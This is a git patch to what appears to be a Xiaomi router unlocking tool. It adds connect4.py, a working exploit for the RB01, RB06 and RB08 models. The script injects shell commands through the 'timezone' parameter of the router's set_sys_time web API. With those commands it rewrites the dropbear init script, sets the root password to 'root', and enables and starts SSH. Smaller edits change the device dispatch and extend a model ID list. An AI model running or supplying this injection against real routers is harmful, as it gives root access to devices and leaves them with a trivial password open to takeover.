From b7702b432dca26f990e280e24171828eb1f82ab4 Mon Sep 17 00:00:00 2001 From: remittor Date: Wed, 14 Sep 2022 14:53:10 +0300 Subject: [PATCH] Add new exploit for RB01, RB06, RB08 --- connect.py | 8 ++++-- connect4.py | 70 +++++++++++++++++++++++++++++++++++++++++++++++++++++ xqimage.py | 18 ++++++++++++-- 3 files changed, 92 insertions(+), 4 deletions(-) create mode 100644 connect4.py diff --git a/connect.py b/connect.py index 7c7775a..b0b5c94 100644 --- a/connect.py +++ b/connect.py @@ -31,7 +31,7 @@ if gw.status < 1: dn = gw.device_name -if dn == 'R2100' or dn == 'R2350' or dn == 'RM1800' or dn == 'RM2100' or dn == 'RA67': +if dn in 'R2100 R2350 RM1800 RM2100 RA67': import connect2 sys.exit(0) @@ -39,10 +39,14 @@ if dn == 'R3600' and gw.rom_version == '1.0.17': import connect2 sys.exit(0) -if dn == 'R3600' or dn == 'RA69' or dn == 'RA70' or dn == 'RA72' or dn == 'RB03': +if dn in 'R3600 RA69 RA70 RA72': import connect3 sys.exit(0) +if dn in 'RB01 RB03 RB06 RB08': + import connect4 + sys.exit(0) + print("device_name =", gw.device_name) print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel)) print("mac = {}".format(gw.mac_address)) diff --git a/connect4.py b/connect4.py new file mode 100644 index 0000000..66cefae --- /dev/null +++ b/connect4.py @@ -0,0 +1,70 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import os +import sys +import types +import platform +import ctypes +import binascii +import re +import requests +import urllib + +sys.path.append(os.path.dirname(os.path.abspath(__file__))) +from gateway import * + +# Devices: +# RB01 FW any AX3200 +# RB06 FW any Redmi AX6000 +# RB08 FW any WifiHome + + +gw = Gateway(timeout = 4, detect_ssh = False) +if gw.status < 1: + die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr)) + +print("device_name =", gw.device_name) +print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel)) +print("mac address = {}".format(gw.mac_address)) + +dn = gw.device_name +gw.ssh_port = 22 +ret = gw.detect_ssh(verbose = 1, interactive = True) +if ret > 0: + die(0, "SSH server already installed and running") + +stok = gw.web_login() + +def exec_cmd(cmd = {}, api = 'misystem/set_sys_time'): + params = cmd + if isinstance(cmd, str): + params = { 'timezone': " ' ; " + cmd + " ; " } + res = requests.get(gw.apiurl + api, params = params) + return res.text + +res = exec_cmd(api = 'xqnetwork/get_netmode') +if '"code":0' not in res: + die('Extension "/api/xqnetwork/get_netmode" not working!') +if '"netmode":4,' not in res: + die('It is necessary to reorganize the device into "whc_cap" mode!') + +#res = exec_cmd('logger hello_world_3335556_') +res = exec_cmd("sed -i 's/`nvram get ssh_en`/1/g' /etc/init.d/dropbear") +if '"code":0' not in res: + die('Exploit not working!!!') +res = exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear") +res = exec_cmd("(echo root; sleep 1; echo root) | passwd root") +res = exec_cmd("/etc/init.d/dropbear enable") +print('Run SSH server on port 22 ...') +res = exec_cmd("/etc/init.d/dropbear restart") +res = exec_cmd("logger -t XMiR ___completed___") + +time.sleep(0.5) +gw.use_ssh = True +gw.passw = 'root' +gw.ping(contimeout = 10) # RSA host key generate slowly! + +print("") +print('#### SSH and Telnet services are activated! ####') + diff --git a/xqimage.py b/xqimage.py index 1ef648d..fb6d667 100644 --- a/xqimage.py +++ b/xqimage.py @@ -80,8 +80,22 @@ xqModelList = [ "RA74", # AX5400 "", "YY01", - "RB01", # 50 - "RB03" # 51 + "RB01", # 50 # AX3200 (INT) + "RB03", # 51 # AX6S + "", + "", + "RB04", # 54 # Redmi AX5400 + "", + "", + "", + "RB08", # 58 # HomeWiFi + "", + "", + "RB06", # 61 # Redmi AX6000 + "", + "", + "CB04", # 64 + "CB0401", # 65 ] def get_modelid_by_name(name):